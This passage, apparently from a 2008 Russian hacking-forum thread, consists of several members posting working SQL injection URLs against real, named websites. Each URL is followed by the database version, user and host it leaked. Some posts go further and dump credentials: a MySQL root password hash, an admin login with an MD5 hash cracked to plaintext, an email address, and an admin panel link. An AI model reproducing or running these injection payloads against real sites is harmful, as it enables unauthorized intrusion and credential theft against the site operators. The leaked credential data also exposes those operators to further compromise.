ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5261  
Старый 07.04.2008, 02:33
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://danko.dn.ua/news.php?id=-17+union+select+1,concat_ws(char(58),version(),use r(),database()),3/*&lang=ru
5.1.22-rc
root@localhost
danko

----------------------------------------------------------------------
http://danko.dn.ua/news.php?id=-17+union+select+1,concat_ws(char(58),user,Password ),3+from+mysql.user/*&lang=ru
root:*7827D3186CC7C1FF860E859079F1DBE1BB72A289

//*******************************************

http://www.newizv.ru/news/?id_news=-11675+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18/*

u10605@10.10.12.75
u10605
5.0.45

Последний раз редактировалось neon_fx; 07.04.2008 в 03:34..
 
Ответить с цитированием

  #5262  
Старый 07.04.2008, 13:43
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

http://agun.kz/
Код:
http://agun.kz/?id=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,10/*
4.1.22:alarko@localhost:wwwalarkokz


http://gafgaf.ru/
Код:
http://gafgaf.ru/index.php?rid=0x2d3127%20union+select+1,2,3,4,5/*
5.0.37-LOG:ALEXUSER_GAFGAF@LOCALHOST:ALEXUSER_GAFGAF


http://www.wollemipine.sk/
Код:
http://www.wollemipine.sk/page.php?lang=ru&id=0x2d3127%20union+select+1,2,3,4,5,6/*
4.1.21:db11330xwp@82.119.226.130:db11330xwp

by CaNNabi$
 
Ответить с цитированием

  #5263  
Старый 07.04.2008, 13:54
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

http://www.aei.brookings.org/publications/abstract.php?pid=296+UNION+SELECT+1,2,concat_ws(0x 3A3a,user(),version(),database()),4,5,6,7/*

PR-5

aei_brookings@10.225.135.70:
:4.0.25-standard-log:
:aei_brookings
__________________________________________________ ______________________

http://www.terntv.com/programmedetails.php?pid=-11+union+select+1,concat_ws(0x3A3a,version(),user( ),database()),3,4,5,6/*

4.1.22-standard:
:terntv@server213-171-218-210.livedns.org.uk:
:tern
__________________________________________________ ______________________
http://www.stjerome.co.uk/page.php?id=-508+union+select+concat_ws(0x3A3a,version(),databa se(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37/*


PR-6

4.1.20:
:stjerome_new:
:dbaccess@mailserver.phidev.co.uk

Есть таблица user.В ней нашёл поле password. Имя подобрать не удалось. Админка: http://www.stjerome.co.uk/admin
__________________________________________________ ______________________
 
Ответить с цитированием

  #5264  
Старый 07.04.2008, 13:55
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

MANHATTAN Technology With Vision
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,version(),6,concat(database (),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19, 20/*
version - 4.0.17-log
user - u10001203@lon1-webmysql-1.msh.demon.net
database - u10001203

Последний раз редактировалось -=megahertz=-; 07.04.2008 в 14:00..
 
Ответить с цитированием

  #5265  
Старый 07.04.2008, 13:59
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

//A World Of Islands
http://www.aworldofislands.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,concat(version(),0x3a,datab ase(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20/*
version - 4.0.27-max-log
user - islands@linhost141.prod.mesa1.secureserver.net
database - islands
 
Ответить с цитированием

  #5266  
Старый 07.04.2008, 14:29
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

http://www.ipodhacks.com/article.php?sid=-2482+union+select+1,2,3,4,concat_ws(0x3A3a,version (),user(),database()),6,7,8,9,10,11/*

PR-6

4.0.27-standard:
:ipodhack_user@localhost:
:ipodhack_mainsite
 
Ответить с цитированием

  #5267  
Старый 07.04.2008, 17:00
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606

Репутация: 105
Отправить сообщение для Fuckel с помощью ICQ
По умолчанию

http://www.auto-instructors.ru/user/comment_text.php?inid=-1+union+select+1,2,3,4,concat_ws(CHAR(58),VERSION( ),DATABASE(),USER()),6,7,8,9/*
не раскрыл: http://www.auto-instructors.ru/paper/interesting/index.php?sort=-stat
4.1.22-log:wwwautoinstructo:autoinst@localhost


http://www.rustoy.ru/dog.php?screen=1&id=-1+union+select+concat_ws(CHAR(58),DATABASE(),USER( ),VERSION())/*
kayrueru_rustoy:kayrueru@81.177.16.93:4.1.22
http://www.rustoy.ru/dog.php?screen=1&id=-1+union+select+concat_ws(CHAR(58),name,password,em ail)+from+users/*
admin:4acc53e9d2ce2f1df7c4c8f9588ffc29:brt@rusdog.ru
4acc53e9d2ce2f1df7c4c8f9588ffc29 = rusdog


http://www.specialradio.ru/mkz/?id=-1+union+select+1,concat_ws(CHAR(58),DATABASE(),USE R(),VERSION()),3,4,5,6,7,8,9/*
host2283:host2283@localhost:4.0.27-log
выключен отчет об ошибках, проверил 2-1


http://www.trolza.ru/project.pl?id=-1+union+select+1,concat_ws(CHAR(58),VERSION(),DATA BASE(),USER()),3,4,5,6/*
5.0.27:trolza:trolza@localhost
колонки какие-то драные, так же отчет об ошибках отключен

Последний раз редактировалось Fuckel; 07.04.2008 в 19:27..
 
Ответить с цитированием

  #5268  
Старый 07.04.2008, 20:16
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

Код:
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10+from+mysql.user/*
кто пройдет дальше отпишите чтоли)
 
Ответить с цитированием

  #5269  
Старый 07.04.2008, 20:53
sD0S
Новичок
Регистрация: 26.02.2008
Сообщений: 3
Провел на форуме:
22786

Репутация: 9
По умолчанию

http://www.lowensign.com/lowensign_v2/cart/show_cart.asp

Version : Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 1)

Databases :
"C:\Program Files\Microsoft SQL Server\MSSQL$CGLIVE2\Data\"
master, tempdb, model, msdb, cg-live,
LowenSignTest, lowensign, Sun, SchwanComp, cartTemp,
lowensports, mining, emailMaster, carMakeModel, CGPartners,
ReeceNicholsComp, Data

Последний раз редактировалось sD0S; 07.04.2008 в 21:02..
 
Ответить с цитированием

  #5270  
Старый 07.04.2008, 22:04
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

а че с antiбояном то, смотрю предыдущие сайты туда не добавленны!!!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ